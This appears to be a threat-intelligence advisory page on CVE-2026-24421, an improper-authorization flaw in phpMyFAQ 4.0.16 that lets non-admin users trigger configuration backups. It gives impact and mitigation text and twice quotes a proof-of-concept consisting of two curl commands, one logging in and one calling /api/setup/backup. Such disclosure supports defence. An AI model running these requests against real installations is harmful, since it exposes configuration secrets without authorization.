phpMyFAQ 4.0.16 - Improper Authorization
phpMyFAQ version 4. 0. 16 contains an improper authorization vulnerability where authenticated non-admin users can trigger a configuration backup via the /api/setup/backup endpoint. The endpoint verifies authentication but fails to enforce admin or configuration permissions, allowing any logged-in user to generate and retrieve a backup link. This vulnerability can lead to exposure of sensitive configuration data if the backup ZIP is accessible due to server misconfiguration.
AI Analysis
Technical Summary
In phpMyFAQ 4.0.16, the SetupController.php uses userIsAuthenticated() to check if a user is logged in but does not verify if the user has configuration or admin permissions before allowing access to the /api/setup/backup API endpoint. This improper authorization flaw enables any authenticated non-admin user to generate a configuration backup and obtain a link to the backup ZIP file. The vulnerability was confirmed with proof-of-concept code demonstrating login as a non-admin user and triggering the backup generation successfully. The issue is tracked as CVE-2026-24421.
Potential Impact
Low-privileged authenticated users can create sensitive configuration backups. If the generated backup ZIP file is accessible via the web server (due to misconfiguration), this can lead to unauthorized disclosure of secrets and configuration data, potentially facilitating further compromise of the system.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the /api/setup/backup endpoint to only authorized admin users. Additionally, ensure that backup files are not publicly accessible via the web server to prevent unauthorized retrieval.
Indicators of Compromise
- exploit-code: # Exploit Title: phpMyFAQ <= 4.0.16 - Improper Authorization # Google Dork: N/A # Date: 2026-01-23 # Exploit Author: GUIA BRAHIM FOUAD # Vendor Homepage: https://www.phpmyfaq.de/ # Software Link: https://www.phpmyfaq.de/download/ # Version: <= 4.0.16 (REQUIRED) # Tested on: Ubuntu 22.04, Apache 2.4.52, PHP 8.2.x, MariaDB 10.6.x # CVE: CVE-2026-24421 ## Summary Authenticated non-admin users can call /api/setup/backup and trigger a configuration backup. The endpoint checks authentication but does not enforce authorization (missing configuration/admin permission check), and returns a link/path to the generated ZIP. ## Details SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged-in user to create a sensitive backup and retrieve its path. ## PoC Precondition: API enabled, any authenticated non-admin user. 1) Log in as a non-admin user: curl -c /tmp/pmf_api_cookies.txt \ -H 'Content-Type: application/json' \ -d '{"username":"tester","password":"Test1234!"}' \ http://192.168.40.16/phpmyfaq/api/v3.0/login 2) Trigger backup generation: curl -i -b /tmp/pmf_api_cookies.txt \ -X POST --data '4.0.16' \ http://192.168.40.16/phpmyfaq/api/setup/backup ## Expected Result The API responds successfully and includes a link/path to the generated ZIP backup even though the caller is not an admin / does not have configuration-edit permissions. ## Impact Low-privileged users can generate sensitive backups. If the ZIP is web-accessible (server misconfiguration), this can lead to exposure of secrets/configuration and facilitate follow-on compromise. ## References - GitHub Advisory: GHSA-wm8h-26fv-mg7g
phpMyFAQ 4.0.16 - Improper Authorization
Description
phpMyFAQ version 4. 0. 16 contains an improper authorization vulnerability where authenticated non-admin users can trigger a configuration backup via the /api/setup/backup endpoint. The endpoint verifies authentication but fails to enforce admin or configuration permissions, allowing any logged-in user to generate and retrieve a backup link. This vulnerability can lead to exposure of sensitive configuration data if the backup ZIP is accessible due to server misconfiguration.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
In phpMyFAQ 4.0.16, the SetupController.php uses userIsAuthenticated() to check if a user is logged in but does not verify if the user has configuration or admin permissions before allowing access to the /api/setup/backup API endpoint. This improper authorization flaw enables any authenticated non-admin user to generate a configuration backup and obtain a link to the backup ZIP file. The vulnerability was confirmed with proof-of-concept code demonstrating login as a non-admin user and triggering the backup generation successfully. The issue is tracked as CVE-2026-24421.
Potential Impact
Low-privileged authenticated users can create sensitive configuration backups. If the generated backup ZIP file is accessible via the web server (due to misconfiguration), this can lead to unauthorized disclosure of secrets and configuration data, potentially facilitating further compromise of the system.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the /api/setup/backup endpoint to only authorized admin users. Additionally, ensure that backup files are not publicly accessible via the web server to prevent unauthorized retrieval.
Technical Details
- Edb Id
- 52523
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for phpMyFAQ 4.0.16 - Improper Authorization
# Exploit Title: phpMyFAQ <= 4.0.16 - Improper Authorization # Google Dork: N/A # Date: 2026-01-23 # Exploit Author: GUIA BRAHIM FOUAD # Vendor Homepage: https://www.phpmyfaq.de/ # Software Link: https://www.phpmyfaq.de/download/ # Version: <= 4.0.16 (REQUIRED) # Tested on: Ubuntu 22.04, Apache 2.4.52, PHP 8.2.x, MariaDB 10.6.x # CVE: CVE-2026-24421 ## Summary Authenticated non-admin users can call /api/setup/backup and trigger a configuration backup. The endpoint checks authentication but doe... (1214 more characters)
Threat ID: 69f1f0fdcbff5d8610047e44
Added to database: 4/29/2026, 11:52:29 AM
Last enriched: 4/29/2026, 11:52:52 AM
Last updated: 4/30/2026, 3:48:56 AM
Views: 7
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.